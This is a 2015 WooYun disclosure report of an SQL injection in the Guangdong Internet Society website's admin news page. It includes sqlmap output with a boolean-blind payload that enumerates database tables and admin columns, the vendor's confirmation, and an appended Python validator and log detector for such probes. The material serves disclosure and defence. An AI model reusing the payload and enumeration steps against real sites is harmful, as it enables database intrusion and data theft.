
Defect ID: wooyun-2015-0141620

Title: SQL injection in the Guangdong Internet Society website exposes information from multiple database tables

Vendor: Guangdong Internet Society (广东省互联网协会)

Author: 衣其

Submitted: 2015-09-16 18:50

Fixed: 2015-11-05 10:04

Published: 2015-11-05 10:04

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 5

Status: handed over to a third-party partner organization (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-16: details sent to the vendor, awaiting the vendor's response
2015-09-21: vendor has confirmed; details visible to the vendor only
2015-10-01: details disclosed to core white hats and domain experts
2015-10-11: details disclosed to regular white hats
2015-10-21: details disclosed to intern white hats
2015-11-05: details disclosed to the public

Brief description:

As the title says.

Detailed description:

http://**.**.**.**/admin/newstext.asp?id=524

Proof of vulnerability:

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**
[*] starting at: 14:41:49
[14:41:49] [INFO] using 'D:\Python27\sqlmap\output\**.**.**.**\session' as session file
[14:41:49] [INFO] resuming injection data from session file
[14:41:49] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[14:41:49] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=524 AND 923=923
---
[14:41:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[14:41:59] [INFO] fetching database names
[14:41:59] [INFO] fetching number of databases
[14:41:59] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session':
[14:41:59] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session':
[14:41:59] [INFO] retrieved:
[14:42:26] [ERROR] unable to retrieve the number of databases
[14:42:26] [INFO] falling back to current database
[14:42:26] [INFO] fetching current database
[14:42:26] [INFO] read from file 'D:\Python27\sqlmap\output\**.**.**.**\session': gdis
available databases [1]:
[*] gdis
[14:42:26] [INFO] fetching tables for database 'gdis'
[14:42:26] [INFO] fetching number of tables for database 'gdis'
[14:42:26] [INFO] retrieved: 9
[14:43:32] [INFO] retrieved: dbo.Aclass
[14:55:46] [INFO] retrieved: dbo.Aclass_link
[15:04:03] [INFO] retrieved: dbo.Aclass_member
[15:13:47] [INFO] retrieved: dbo[15:15:07] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
.admin
[15:22:32] [INFO] retrieved: dbo.article
[15:32:44] [INFO] retrieved: dbo.article_link
[15:41:21] [INFO] retrieved: dbo.article_member
[15:51:43] [INFO] retrieved: dbo.dtproperties
[16:07:28] [INFO] retrieved: dbo.img
Database: gdis
[9 tables]
+--------------------+
| dbo.Aclass |
| dbo.Aclass_link |
| dbo.Aclass_member |
| dbo.admin |
| dbo.article |
| dbo.article_link |
| dbo.article_member |
| dbo.dtproperties |
| dbo.img |
+--------------------+
[16:13:32] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\**.**.**.**'
[*] shutting down at: 16:13:32


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://**.**.**.**
[*] starting at: 16:27:36
[16:27:36] [INFO] using 'D:\Python27\sqlmap\output\**.**.**.**\session' as session file
[16:27:36] [INFO] resuming injection data from session file
[16:27:36] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[16:27:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=524 AND 923=923
---
[16:27:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[16:27:46] [INFO] fetching columns for table 'dbo.admin' on database 'gdis'
[16:27:46] [INFO] fetching number of columns for table 'dbo.admin' on database 'gdis'
[16:27:46] [INFO] retrieved: 8
[16:28:55] [INFO] retrieved: CompanyName
[16:42:59] [INFO] retrieved: nvarchar
[16:53:10] [INFO] retrieved: flag
[16:58:59] [INFO] retrieved: int
[17:03:33] [INFO] retrieved: id
[17:07:00] [INFO] retrieved: int
[17:11:34] [INFO] retrieved: name
[17:17:24] [INFO] retrieved: nvarchar
[17:27:51] [INFO] retrieved: pa

Fix recommendation:

Filter the input.

Copyright notice: when reposting, please credit the source: 衣其@乌云
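The "filter" recommendation above, as an added illustration that is not part of the report or the site's code: a strict integer allowlist for the id parameter of newstext.asp (which rejects a probe such as 524 AND 923=923 before any SQL is built), plus a detector that flags such boolean tautology probes in constructed IIS-style log lines. The log layout, field order and sample requests are assumptions; the actual ASP code of the site is not on the page, and validation complements rather than replaces a parameterized query.

```python
import re
from urllib.parse import parse_qs

# Allowlist for a numeric record id such as newstext.asp?id=524:
# only an unsigned decimal integer passes, so "524 AND 923=923" fails
# here instead of reaching the query string of the SQL statement.
_ID_RE = re.compile(r"^[0-9]{1,9}$")

def parse_article_id(raw):
    """Return the id as an int, or None if it is not a plain integer."""
    if raw is None or not _ID_RE.match(raw):
        return None
    return int(raw)

# Shape of the boolean-based blind probe quoted in the report
# ("AND 923=923"); used only to flag suspicious requests in logs.
_PROBE_RE = re.compile(r"(?i)\b(and|or)\b\s+\d+\s*=\s*\d+")

def flag_suspicious_requests(log_lines):
    """Scan W3C-style IIS log lines; return (uri, param, reason) per hit."""
    hits = []
    for line in log_lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        # assumed layout: date time c-ip cs-method cs-uri-stem cs-uri-query
        if len(fields) < 6:
            continue
        uri, query = fields[4], fields[5]
        qs = parse_qs("" if query == "-" else query)  # decodes %20 etc.
        for key, values in qs.items():
            for value in values:
                if _PROBE_RE.search(value):
                    hits.append((uri, key, "boolean-blind probe"))
                elif key == "id" and parse_article_id(value) is None:
                    hits.append((uri, key, "non-numeric id"))
    return hits

# Constructed sample log; the IP and timestamps are made up.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query
2015-09-16 14:41:49 10.0.0.5 GET /admin/newstext.asp id=524
2015-09-16 14:41:50 10.0.0.5 GET /admin/newstext.asp id=524%20AND%20923=923
2015-09-16 14:41:51 10.0.0.5 GET /admin/newstext.asp id=524%20AND%20923=924
2015-09-16 14:41:52 10.0.0.5 GET /admin/newstext.asp id=524abc
2015-09-16 14:41:53 10.0.0.5 GET /index.asp -
""".splitlines()

if __name__ == "__main__":
    for hit in flag_suspicious_requests(SAMPLE_LOG):
        print(hit)
```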


Responses

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-09-21 10:03

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Affected data: high
Attack cost: low
Impact: high
Overall rating: high, rank: 10
We are contacting the responsible website administration unit to handle it.

Latest status:

None yet